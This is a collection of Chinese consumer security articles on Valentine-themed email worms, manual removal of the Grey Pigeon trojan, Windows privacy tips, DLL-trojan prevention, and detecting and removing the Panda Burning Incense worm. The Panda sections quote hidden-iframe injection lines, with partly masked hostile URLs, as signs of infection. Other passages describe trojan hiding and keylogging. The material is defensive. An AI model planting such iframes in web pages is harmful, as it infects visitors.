爱情背后的幽灵--情人节与病毒
爱情是美丽、永恒的主题，所以就有了2月14日的情人节。网络时代，爱情依然在被吟唱，只是又多了一位主角—病毒。这些“幽灵”伪装成传送爱情信件的使者，穿梭于网络之间。人们往往会被那些美丽、浪漫的词藻所诱惑，而屡屡中招，那么硬盘被格式化、要么系统造成崩溃。

    一 病毒的恋爱—“爱虫”

    爱情是每个人的权利，所以，我要恋爱，就连病毒也不例外。

    “爱虫”病毒（vbs.loveletter）是一个比较著名的病毒，在2000年的青年节（5月4日）通过互联网传遍全球，它会给每一个渴望爱情的人们发送一封附件名为：Love-Letter-for-you.txt.vbs的病毒邮件，如果用户以为是一封情书而观看的话，病毒便被激活，它会使机器中的十二种文件，将这些文件全部“打上病毒的烙印”，病毒的充分传染，最终会使您的系统崩溃。



    二 病毒情人—“罗米欧与朱丽叶”

    病毒也要告诉你一个关于“罗米欧与朱丽叶”的故事

    “罗米欧与朱丽叶”的故事吸引着古往今来无数人的感谓，已经成了西方爱情的代名词，所以当你收到附件如My Romeo（我的罗米欧）和My Juliet（我的朱丽叶）的邮件时，您会不动心吗？当您动心之时，也就是机器遭殃之日，（worm. Blebla）病毒同样是感染系统中的所有网页类文件，并向发送大量邮件，进行传播。



    三 病毒的约会—“我的晚会”

    我的晚会， 你能拒绝吗？

    如果我请你参加我的晚会，你会拒绝吗？对于恋爱中的情人来说，如果女方收到了这样的邀请信，不但不会拒绝，相反还会很感动，“我的晚会”病毒(worm.myparty)就是利用了人们这样的心理，会发送标题是：“new photos from my party!”

    内容是：Hello
          My party... It was absolutely amazing!
          I have attached my web page with new photos!
          If you can please make color prints of my photos. Thanks!
    附件是： www.myparty.yahoo.com的病毒邮件，如果你信以为真，不但晚会去不成，连计算机也会被病毒控制，病毒会为所欲为。



    四 病毒的”情人节”

    恋爱的人们，来过情人节吧。

    虽然单身汉们总是在落寞地吟唱着“没有情人的情人节”，但有了情人的情人节如果碰到这个病毒,我想心情也不会好多少。该病毒就是“情人节”病毒(vbs.valentin).它会藏在网页文件中并将自已加密，然后通过邮件系统将“情人节的祝福”送到世界各地，附件名是: loveday14-b.hta, 怎么样，够浪漫吧，但如果你查看了该附件，病毒就会运行并监视系统，当机器时间是2月14日时（每个情人不会不知道的节日），病毒便会发作，会将计算机C盘中的所有文件，用一些西班牙语的文本进行覆盖，这就是“情人节”送给你的礼物，下次开机时，C盘系统将会荡然无存，让你在情人节这天永远也不会忘记这个病毒。



    情人节即将来到，浪漫的人们也一定要注意防毒，在网上约会情人的时候，不要成为这些情人病毒的下一个猎物。

    赶快杀毒吧！

不一样的“情人节”病毒
情人节的出现，使天下的男女又多了一个可以在一起的节日，但网恋的男女就没有这么幸运了，他们不但要冒着对方是“恐龙” 的危险，它们还要防止一件事，就是病毒的侵扰，尤其是邮件病毒和网页类病毒，它们会随着节日里上网与收发邮件的激增而大量泛滥。

    情人节到了，下面就给大家介绍几个不同类型的“情人节”病毒，使大家了解一下病毒与情人节的故事。

    情人节（vbs.Valentin）病毒是一个会写情书的病毒。它会将自身用脚本加密引擎加密后插入到HTML文件中，病毒运行时会产生一个名为Main.htm的病毒文件，并拷贝到系统目录中。并搜索outlook的地址薄中的所有邮件地址，向这些地址发送标题为：Feliz san valentin，内容为：Feliz san valentin. Por favor visita...的病毒邮件。

    该病毒还会通过网络聊天工具mIRC的共享目录，并在mIRC的文件夹下建立Script.ini文件，当mIRC下次启动时，病毒便会自动运行，继续传播。

    病毒会在每个月的14号发作，发作时会以一封西斑牙情书的内容覆盖掉硬盘中的所有文件，并将覆盖过的文件扩展名全部改为.txt，使用户的系统完全崩溃，这封情书的内容如下：

    Hola, me llamo Onel2 y voy a utilizar tus archivos para declararle mi amor
    a Davinia, la chica mas guapa del mundo.
    Feliz san Valentin Davinia. Eres la mas bonita y la mas simpatica.
    Todos los dias a todas horas pienso en ti y cada segundo que no te veo
    es un infierno.
    Quieres salir conmigo?
    En cuanto a ti usuario, debo decirte que tus ficheros
    no han sido contaminados por un virus,
    sino sacralizados por el amor que siento por Davinia

    桑河情人（VBS.San）病毒是一个会删除了你的文件还要祝你情人节快乐的病毒。病毒运行时会产生一个Loveday14-a.hta的文件，该文件是编译过的病毒格式，可以被系统自动执行。病毒会将这个情人节的文件放入系统的启动目录，每次开机会病毒会自动运行

    该病毒还会产生一个index.htm的病毒文件，然后拷贝到windows的系统目录下,并将该文件加为outlook邮箱的默认信纸文件，这样，只要用户发信，就可以自动将该病毒发送出去。

    该病毒在每个月8、14、23、29号发作，发作时会将c盘的所有根目录都保留，只将这些根目录中的所有文件及子目录都删除，而且还会建立一个名为：”happysanvalentin”(情人节快乐)的目录，来示威。用户除了系统崩溃外也只能苦笑了，大概这就是爱的代价吧。

    亲密爱人（vbs.candylove）病毒是最浪漫的病毒。该病毒运行时会在C:WINDOWS目录或C:WINNT目录下产生一个名为：ilove.vbs的病毒文件，并修改注册表的自启动项，以便每次开机时自动运行该病毒。

    该病毒会通过系统的wscript引擎无穷地自制自身，感染硬盘中的所有目录。每次会在：Te amo.vbs、Te quiero.vbs、Solo pienso en ti.vbs、Eres lo mejor.vbs、Poemas de amor.vbs、Amigo.vbs这六个文件名中随机选择一个做为病毒文件名，病毒还会对自己的感染进行计数，当病毒发现自己已经感自制了1000次以上，病毒便自动弹出关于情人节的消息框：

    feliz día de san valentín, día del amor, día de la amistad, dia de los enamorados...
    son los mejores desceos del  (FBI) Fuerza Bruta Inteligente ...Hacked oaxaca....tqm..
    cualquier comentario escribir a anonimomix@mixmail.com以示炫耀。

    该病毒在传染时会消耗大量的系统资源，导致系统变慢至到系统停止响应。

    该病毒会在每年的情人节时发作（2月14日），发作时会删除windows文件夹中的所有文件并且执行记事本的1001个拷贝。

系统安全：系统安全之教你手工清除灰鸽子Vip2005
手工清除灰鸽子并不难，重要的是我们必须懂得它的运行原理。

　　灰鸽子的运行原理

　　灰鸽子远程监控软件分两部分：客户端和服务端。黑客（姑且这么称呼吧）操纵着客户端，利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe，然后黑客通过各种渠道传播这个服务端（俗称种木马）。种木马的手段有很多，比如，黑客可以将它与一张图片绑定，然后假冒成一个羞涩的MM通过QQ把木马传给你，诱骗你运行；也可以建立一个个人网页，诱骗你点击，利用IE漏洞把木马下载到你的机器上并运行；还可以将文件上传到某个软件下载站点，冒充成一个有趣的软件诱骗用户下载……这正违背了我们开发灰鸽子的目的，所以本文适用于那些让人非法安装灰鸽子服务端的用户，帮助用户删除灰鸽子Vip2005的服务端程序。本文大部分内容摘自互联网。

　　G_Server.exe运行后将自己拷贝到Windows目录下(Windows98/xp下为系统盘的windows目录，Windows2000/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。

　　Windows目录下的G_Server.exe文件将自己注册成服务（9X系统写注册表启动项），每次开机都能自动运行，运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能，与控制端客户端进行通信；G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此，中毒后，我们看不到病毒文件，也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe的进程空间中，有时候则是附在所有进程中。

　　灰鸽子的手工检测

　　由于灰鸽子拦截了API调用，在正常模式下服务端程序文件和它注册的服务项均被隐藏，也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外，灰鸽子服务端的文件名也是可以自定义的，这都给手工检测带来了一定的困难。

　　但是，通过仔细观察我们发现，对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出，无论自定义的服务器端文件名是什么，一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点，我们可以较为准确手工检测出灰鸽子服务端。

　　由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。

　　1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开“我的电脑”，选择菜单“工具”—》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。

　　2、打开Windows的“搜索文件”，文件名称输入“_hook.dll”，搜索位置选择Windows的安装目录（默认98/xp为C:\windows，2k/NT为C:\Winnt）。

　　3、经过搜索，我们在Windows目录（不包含子目录）下发现了一个名为Game_Hook.dll的文件。

　　4、根据灰鸽子原理分析我们知道，如果Game_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录，果然有这两个文件，同时还有一个用于记录键盘操作的GameKey.dll文件。

　　经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了，下面就可以进行手动清除。

　　灰鸽子的手工清除

　　经过上面的分析，清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。

　　注意：为防止误操作，清除前一定要做好备份。

　　一、清除灰鸽子的服务

　　Windows2000／WindowsXP系统：

　　1、打开注册表编辑器（点击“开始”－》“运行”，输入“Regedit.exe”，确定。），打开


　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services



　　注册表项。
　　2、点击菜单“编辑”－》“查找”，“查找目标”输入“game.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为Game_Server）。

　　3、删除整个Game_Server项。

　　Windows98／WindowsME系统：

　　在Windows9X下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开


　　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run



　　项，我们立即看到名为Game.exe的一项，将Game.exe项删除即可。
　　二、删除灰鸽子程序文件

　　删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新启动计算机。至此，灰鸽子VIP 2005服务端已经被清除干净。

系统安全知识：菜鸟安全防护Windows八大保密技巧
Windows自带的功能，为了方便我们的使用，有自动记录的功能，但是这些功能有些事情也把我们的“行踪”给暴露了，这个时候应该怎么办呢？请看本文为你介绍的八种方法，可以让你使用的电脑了无痕迹。

　　1.彻底地一次删除文件

　　首先，应从系统中清除那些你认为已肯定不用的文件，这里我们指的是你丢弃到回收站中的所有垃圾文件。当然，我们还可以在任何想起的时候把回收站清空(双击回收站图标，然后选择“文件”菜单，再选择“清空回收站(B)” 命令)，但更好的方法是关闭回收站的回收功能。要彻底地一次删除文件，可右击回收站图标，选择“属性”，然后进入“全局”选项卡，选择“所有驱动器均使用同一设置(U):”，并在“删除时不将文件移入回收站，而是彻底删除(R)”复选框打上选中标记。

　　本步骤是不让已经被删除的文件继续潜藏在回收站中。

　　2.不留下已删除文件的蛛丝马迹

　　即使窥探者无法直接浏览文档内容，他们也能通过在MicrosoftWord或Excel的“文件”菜单中查看你最近使用过哪些文件来了解你的工作情况。这个临时列表中甚至列出了最近已经被你删除的文件，因此最好关闭该项功能。在 Word或Excel中，选择“工具”菜单，再选择“选项”菜单项，然后进入“常规”选项卡，在“常规选项”中取消“列出最近所用文件(R)”前面的复选框的选中标记。

　　本步骤是消除最近被删除的文件留下的踪迹，为此，在 Word、Excel和其它常用应用程序中清除“文件”菜单中的文件清单。

　　3.隐藏文档内容

　　应隐藏我们目前正在使用着的文档的踪迹。打开“开始”菜单，选择“文档”菜单项，其清单列出了你最近使用过的约 15个文件。这使得别人能够非常轻松地浏览你的工作文件或个人文件，甚至无需搜索你的硬盘。要隐藏你的工作情况，就应将该清单清空。为此，你可以单击“开始”菜单中的“设置”菜单项，然后选择“任务栏和开始菜单”，进入“任务栏和开始菜单”，再选择“高级”选项卡，单击该选项卡中的“清除(C)”按钮即可。

　　本步骤是在Windows“开始”菜单中，清除“文档”菜单项所包含的文件，把这些文件隐藏起来。

　　4.清除临时文件

　　Microsoft Word和其它应用程序通常会临时保存你的工作结果，以防止意外情况造成损失。即使你自己没有保存正在处理的文件，许多程序也会保存已被你删除、移动和复制的文本。应定期删除各种应用程序在WINDOWSTEMP文件夹中存储的临时文件，以清除上述这些零散的文本。还应删除其子目录(如 FAX和WORDXX目录)中相应的所有文件。虽然很多文件的扩展名为TMP，但它们其实是完整的DOC文件、HTML文件，甚至是图像文件。

　　本步骤是清除硬盘上的临时文件和无用文件。

　　5.保护重要文件

　　对重要文件进行口令保护，这在 Word和Excel中很容易实现。依次选择“文件”、“另存为”，然后选择“工具”中的“常规选项”，在“打开权限密码”和“修改权限密码”中输入口令，最好不要使用真正的单词和日期作为口令，可以混合使用字母、数字和标点符号，这样口令就很难破译。当然，以后每当你打开和修改文档时，都必须输入口令。

　　本步骤可以为我们重要的文件加上一把锁。

　　6.改写网页访问历史记录

　　浏览器是需要保护的另一个部分。现在大多数的用户因为安装了微软公司的视窗系统，所以使用Internet Explorer作为上网所使用的浏览器。Internet Explorer会把访问过的所有对象都会列成清单，其中包括浏览过的网页、进行过的查询以及曾输入的数据。Internet Explorer 把网页访问历史保存在按周划分或按网址划分的文件夹中。我们可以单个地删除各个“地址(URL)”，但最快的方法是删除整个文件夹。要清除全部历史记录，可在“工具”菜单中选择“Internet 选项”，然后选择“常规”选项卡，并单击“清除历史记录”按钮。

　　本步骤是清除浏览器的历史记录。

　　7.输入网址但不被记录

　　Internet Explorer记录你在浏览器中输入的每个网址，你不妨验证一下:在工具栏下边的地址窗口中输入一个 URL地址，浏览器将把该地址　记录在下拉菜单中，直到有其它项目取代了它。你可以通过下面的方法访问网站，而所使用的网址将不被记录:在浏览器中可以按下Ctrl-O键，然后在对话框中输入URL地址即可。

　　本步骤可以使访问过的网址不被记录。

　　8.清除高速缓存中的信息

　　Internet Explorer在硬盘中缓存你最近访问过的网页。当你再次访问这些网页时，高速缓存信息能够加快网页的访问速度，但这也向窥探者揭开了你的秘密。要清除高速缓存中的信息，在Internet Explorer中，应在“工具”菜单中选择“Internet 选项”，然后进入“常规”选项卡，单击“删除文件”按钮。

系统安全知识：Windows操作系统常遇木马预防技巧
木马程序是目前比较流行的一类病毒文件，它与一般的病毒不同，它不会自我繁殖，也并不刻意地去感染其他文件。它通过将自身伪装吸引用户下载执行，或以捆绑在网页中的形式，当用户浏览网页时受害。木马程序向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件和隐私，甚至远程操控被种者的电脑。木马的原理和计算机网络中常常要用到的远程控制软件相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性;而木马程序则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是毫无价值的。

　　木马通常有两个可执行程序:一个是客户端，即控制端，另一个是服务端，即被控制端。木马的设计者为了防止木马被发现，而采用多种手段隐藏木马。木马的服务一旦运行，电脑就会有一个或几个端口被打开，黑客就可以利用控制端进入运行了服务端的电脑，甚至可以控制被种者的电脑，所以被种者的安全和个人隐私也就全无保障了!

　　随着微软的操作系统从Win9X过渡到WinNT系统(包括2000/xp/2003)，微软的任务管理器也一下子“脱胎换骨”，变得“火眼金睛”起来 (在Win9X中，只需要将进程注册为系统服务就能够从进程查看器中隐形，可是这一切在WinNT中却完全不同，无论木马从端口、启动文件上如何巧妙地隐藏自己，始终都不能欺骗WinNT的任务管理器)，这使得以前在win9X操作系统下靠将进程注册为系统服务就能够从任务管理器中隐形的木马面临前所未有的危机，所以木马的开发者及时调整了开发思路，转入了开发可以躲避WinNT的任务管理器的进程查询的动态嵌入式DLL木马。

　　要弄清楚什么是动态嵌入式DLL木马，我们必须要先了解Windows系统的另一种“可执行文件”——DLL，DLL是Dynamic Link Library(动态链接库)的缩写，DLL文件是Windows的基础，因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑，是由多个功能函数构成，它并不能独立运行，DLL文件一般都是由进程加载并调用的。

　　因为DLL文件不能独立运行，所以在进程列表中并不会出现DLL。所以木马的开发者就通过编写动态嵌入式DLL木马，并且通过别的进程来运行它，那么无论是入侵检测软件还是进程列表中，都只会出现那个进程而并不会出现那个DLL木马。如果那个进程是可信进程(例如资源管理器Explorer.exe)，那么就没人会怀疑DLL文件也是个木马了。从而木马就又实现了自己的隐蔽性的功能，所以，预防DLL木马也是相当重要的。

　　在WinNT系统，DLL木马一般都藏在System32目录下(因为System32是系统文件存放的目录，里面的文件很多，在里面隐藏当然很方便了)，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一次记录:点击开始—运行—输入cmd回车—出现DOS命令行模式—输入cd\回车，再输入cd C:\Windows\System32回车，这就转换目录到了System32目录(要还是不知道怎么进入的，请参看DOS的cd命令的使用)，输入命令:dir *.exe>exebackup.txt & dir *.dll>dllbackup.txt回车。

　　这样，我们就把System32目录下所有的exe文件和所有的dll文件都记录在exebackup.txt和dllbackup.txt里面了。日后如发现系统异常而用传统的方法又查不出问题时，则要考虑是不是系统中已经潜入了DLL木马。

　　这时我们用同样的方法将System32目录下的EXE和DLL文件记录到另外exebackup1.txt和dllbackup1.txt中，然后运行 CMD—fc exebackup.txt exebackup1.txt>different.txt & fc dllbackup.txt dllbackup1.txt>different.txt(使用FC命令比较前后两次的DLL和EXE文件，并将结果输入到 different.txt中)，这样我们就能发现一些多出来的DLL和EXE文件，然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。

　　没有是最好，如果有的话也不要直接删除掉，可以先把它移到回收站里，若系统没有异常反应再将之彻底删除，或者把DLL文件上报给反病毒研究中心检查。
　　
　　最后，防治木马的危害，专家建议大家应采取以下措施:

　　第一，安装反病毒软件和个人防火墙，并及时升级。

　　第二，把个人防火墙设置好安全等级，防止未知程序向外传送数据。

　　第三，使用安全性比较好的浏览器和电子邮件客户端工具。

　　第四，操作系统的补丁要经常进行更新。

　　第五，不要随便打开陌生网友传送的文件和下载、使用破解软件。

　　相信大家只要做好安全防护工作，防治木马并不是那么可怕的。

“熊猫烧香”病毒疯狂肆虐 专家教你如何快速识别
目前，“尼姆亚（也称熊猫烧香）”病毒正在互联网上肆虐。该病毒采用“熊猫烧香”头像作为图标，诱使用户运行。该变种会感染用户计算机上的EXE可执行文件，被病毒感染的文件图标均变为“熊猫烧香”。同时，受感染的计算机还会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。该病毒可通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致整个局域网瘫痪，无法正常使用。

    据悉，目前多家著名网站已经遭到此类攻击，而相继被植入病毒。由于这些网站的浏览量非常大，致使此次“熊猫烧香”病毒的感染范围非常广，中毒企业和政府机构已经超过千家，其中不乏金融、税务、能源等关系到国计民生的重要单位。

    如果用户的电脑中出现下列现象之一，则表明已经中毒，就应该立刻采取措施清除该病毒。

一、程序的图标变成“熊猫烧香”

    熊猫烧香病毒会感染计算机上的EXE可执行文件，被该病毒感染的文件图标会变成一只熊猫手捧三炷香的样子。


图一：文件图标被更改为“熊猫烧香”

二、在硬盘根目录下生成“熊猫烧香”图标的文件

    1、打开“我的电脑”，用鼠标右键点击“C盘”、“D盘”等图标，在弹出的菜单中会出现名为“Auto”的项目。


图二：右键菜单被添加名为“Auto”的项目 [点击查看大图]

    2、用一些辅助工具，如WinRAR等，可以看到根目录下有名为“setup.exe”和“autorun.inf”的文件，其中“setup.exe”的图标为“熊猫烧香”。


图三：硬盘根目录下生成“熊猫烧香”图标的文件 [点击查看大图]

三、网页文件被添加病毒代码

    用记事本打开HTM等格式的网页文件，若在文件尾部发现类似“<iframe src=http://www.****r.com/worm.htm width=0 height=0></iframe>”的内容，说明计算机已感染“熊猫烧香”病毒。

    注：“src=”后面的网址，不同的病毒变种会有所区别。



图四：网页文件被添加病毒代码 [点击查看大图]

    瑞星已经发布针对该病毒的专杀工具，所有用户均可以去瑞星网站（http://it.rising.com.cn/Channels/Service/index.shtml）免费下载使用。

“熊猫烧香”病毒疯狂肆虐 专家教你如何进行防范
目前，“尼姆亚（也称熊猫烧香）”病毒正在互联网上肆虐。该病毒采用“熊猫烧香”头像作为图标，诱使用户运行。该变种会感染用户计算机上的EXE可执行文件，被病毒感染的文件图标均变为“熊猫烧香”。

    该病毒针对企业网络的攻势愈加剧烈，甚至出现了企业用户求助超过个人用户的状况。这意味着，单从感染计算机台数来看，该病毒感染的企业局域网内电脑数量已经比个人电脑多了数十倍。国外杀毒软件升级困难，使得这些企业用户面对“熊猫烧香”的疯狂攻击而束手无策。

    防范该病毒并不复杂，只需简单几步就可以使您的计算机远离“熊猫烧香”病毒。

第一，安装杀毒软件及个人防火墙升级到最新版本，并打开实时监控程序。

    由于现在海底光缆中断，很多国外杀毒软件难以升级，瑞星杀毒软件及个人防火墙免费为用户提供三个月服务，所有用户均可登陆：http://www.rising.com.cn/free/index.htm 免费下载并使用。

    瑞星个人防火墙已经升级了内置规则，只需启用“家长保护”即可阻止病毒从互联网上下载其它的病毒或进行自我升级。

第二，给管理员帐号设置较为复杂的密码。

    1、在“我的电脑”图标上单击鼠标右键，选择“管理”-〉“本地用户和组”-〉“用户”。

    2、在右边的窗格中找到具有管理员权限的帐号，用鼠标右键点击该名称，选择“设置密码”，输入新的密码。


图一：为管理员设置密码 [点击查看大图]

    3、新的密码应尽量的复杂，采用字母加数字混合，并且长度在8位以上。

第三，关闭系统“自动运行”功能

    1、点击“开始”-〉“运行”，输入“gpedit.msc”，确定，打开组策略编辑器。

    2、点击“计算机配置”-〉“管理模板”-〉“系统”，在右边的窗格中找到“关闭自动播放”一项。



图二：组策略窗口 [点击查看大图]

    3、双击该项目。在弹出的窗口中选择“已启用”，并在“关闭自动播放”的下拉菜单中选择“所有驱动器”，点击“确定”关闭该窗口。


图三：关闭“自动播放” [点击查看大图]

    4、点击“开始”-〉“运行”，输入“gpupdate”，确定，以便刷新组策略，使刚才的更改生效。

第四、安装系统和应用软件补丁

    1、打开IE浏览器，点击菜单中的“工具”-〉“WindowsUpdate”，安装所有的关键更新。

    2、QQ、UC的漏洞已经被该病毒利用，用户应该去他们的官方网站打好最新补丁。更新QQ，单击菜单按钮，选择“帮助”-〉“在线升级”。新浪UC的用户可登陆http://download.51uc.com/uc_download.shtml?tool_0下载补丁程序。

    该病毒会利用IE浏览器的漏洞进行攻击，因此用户应该给IE打好所有的补丁。如果必要的话，用户可以暂时换用Firefox、Opera等比较安全的浏览器。

第五、安装卡卡上网安全助手并开启“IE防漏墙”

    瑞星卡卡上网安全助手是瑞星公司开发的一款专业的反流氓软件工具，所有用户均可登陆瑞星网站http://tool.ikaka.com免费下载使用。
   
    卡卡助手中独创的“IE防漏墙”技术可有效阻止“熊猫烧香”等病毒及流氓软件利用IE、QQ、UC等漏洞侵入用户的计算机。安装卡卡助手后，屏幕右下角的托盘区会出现“IE防漏墙”的图标。



图四：IE防漏墙图标

    当用户访问的网站带有恶意代码时会自动弹出提示窗口，建议用户点击“阻止”按钮阻止病毒侵入。


图五：IE防漏墙阻止病毒入侵

“熊猫烧香”病毒疯狂肆虐 专家教你如何彻底清除
近一段时间，一个名为“熊猫烧香”（Worm.Nimaya）的病毒在互联网上疯狂肆虐。

    该病毒采用“熊猫烧香”头像作为图标，诱使用户运行。该变种会感染用户计算机上的EXE可执行文件，被病毒感染的文件图标均变为“熊猫烧香”。同时，受感染的计算机还会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染，上传网页到网站后，就会导致用户浏览这些网站时也被病毒感染。目前多家著名网站已经遭到此类攻击，而相继被植入病毒。







一、使用瑞星杀毒软件清除

    由于现在海底光缆中断，很多国外杀毒软件难以升级，瑞星杀毒软件免费为用户提供三个月服务，任何用户均可登陆：http://www.rising.com.cn/free/index.htm 免费下载并使用。

    免费版本的瑞星杀毒软件与正式版本功能没有区别，安装时不需要输入序列号即可使用。

    安装后，请立即点击“升级”按钮，升级杀毒软件到最新版本，进行全盘杀毒。



[点击查看大图]

二、使用专杀工具清除

    针对该病毒，瑞星已经推出了专杀工具。没有安装杀毒软件的用户可登陆瑞星网站http://it.rising.com.cn/Channels/Service/2006-11/1163505486d38734.shtml免费下载使用。

    专杀工具采用瑞星独创的未知病毒查杀技术，可有效清除“熊猫烧香”病毒及其未知变种。



[点击查看大图]

三、手工清除

1、 清除内存中的病毒

    i. 由于该病毒会禁止“任务管理器”运行，可以使用第三方的进程管理工具，如Procview等结束病毒的进程。

    ii. 在进程列表中找到“spcolsv.exe”项，单击鼠标右键，选择“结束进程”。

    iii. 对于WindowsXP系统，可以直接点击“开始”-〉“运行”，输入“ntsd -c q -pn spcolsv.exe”结束病毒的进程。

2、修复注册表项目

    i. 运行regedit.exe，打开注册表编辑器。

    ii. 找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\Advanced\Folder\Hidden\SHOWALL一项，将CheckedValue改成1。

    iii. 打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run，将svcshare的项目删除。

3、删除病毒文件

    i. 打开“我的电脑”，选择菜单“工具”-》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。同时取消掉“隐藏已知类型文件的扩展名”前的对勾，然后点击“确定”。

    ii. 在硬盘的各个分区上点击鼠标右键，选择“打开”，切忌直接双击。




    iii. 删除根目录下的“setup.exe”（图标为“熊猫烧香”）和“autorun.inf”文件。

    iv. 进入系统目录下的drivers目录，默认为C:\windows\system32\drivers，将其下的spcolsv.exe文件删除。

    v. 重新启动计算机，检查这几个文件是否存在，如果不存在，则病毒已被清除干净。

4、恢复被病毒修改的网页文件

    搜索计算机上所有的网页文件，找到“<iframe src="http//www.ctv1**.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>”，将其删除。不同的变种加入的网址有所不同，建议采用杀毒软件进行清除操作。

5、修复被病毒感染的文件

    该病毒的一些变种会感染EXE可执行文件，因此建议使用杀毒软件或专杀工具清除该病毒。

熊猫启示录---风波过后的反思
随着“熊猫烧香”作者承诺不在更新新的版本，一场轰轰烈烈“杀猫”大战看似已经逐渐平静下来。但是这场风波带给我们的启示确不应该让大家这么快的忘记……

熊猫本身
在这个“金钱至上”的年代，“熊猫”确是一个非常另类的病毒。因为它的最终目的不是为得到经济利益。难道“熊猫”是回到早先的黑客们为录炫耀自己的技术而诞生的？或者是作者为了对早期黑客单纯目的表示敬意？但是从目前我们能看到的信息来看，作者的目的是对普通用户的一次警醒，更是对安全厂商的一次嘲弄！从技术上来说该病毒并没有什么创新之处，但是它却借鉴很多经典病毒，木马甚至是劫持软件的长处。这样一个没有尖端技术却拥有最成熟技术的病毒综合体来到我们面前。
“熊猫烧香”的名字的由来应该是被病毒感染后EXE文件图标会变成一个动态的在烧香熊猫。但是大家有没有想过作者为什么要如此煞费苦心的突出这个熊猫呢？而这个烧香熊猫到底如此“虔诚”的在祈求什么呢？这答案值得每个人细细品位。

用户
“熊猫”很厉害但是跟以往病毒大规模感染不同，用户明显分成2个阵营一个根本不知“熊猫”为何物一个被这只熊猫折磨的痛苦不堪。为什么会这样呢？感染熊猫后清除是极其麻烦的，显然没有什么机器能幸免，那问题一定都出在“防”上！“熊猫”犹如一柄石中剑，它考验用户的机器综合安全体系以及上网习惯。

厂商
面对反病毒技术没有突破性的进步，面对厂商的一次一次升级一次一次的广告攻势。面对用户的盲从。这只熊猫代来了“讽刺”也带来了答案！任何一个技术单一拿出来安全软件都能应付，但是综合到一起了呢？经济利益推动的升级在这只熊猫面前漏出本来的面目……熊猫不是卖点，它仅是测试,安全对软件的测试。

没有走远的熊猫
“熊猫烧香”作者承诺不在更新新的版本。但是不要指望你会摆脱它的困扰，因为有更有的“非标准”版本在酝酿而且更可怕并不是“熊猫“本身而是在病毒/木马制作思路上的变化，以后用多少新的病毒/木马会借鉴“熊猫”的经验呢？一切才刚刚开始！

应对
目前所有的下载网站杀毒软件的下载有非常热门，可见用户对其投入的关注度已经非常高。但是补丁，防火墙的下载却相对很少，这正体现目前用户安全防御上蹩脚走路的状况。但是以后要面对的将考验你安全上的综合措施，仅仅依靠一个或几个杀毒软件带给你的将不在是安全。